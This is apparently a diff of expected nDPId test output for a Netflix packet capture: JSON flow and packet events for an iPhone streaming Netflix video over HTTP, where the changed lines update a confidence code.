00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"} 
-01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
-01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"} 
-01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
{"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -245,94 +245,94 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"} 
-01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 
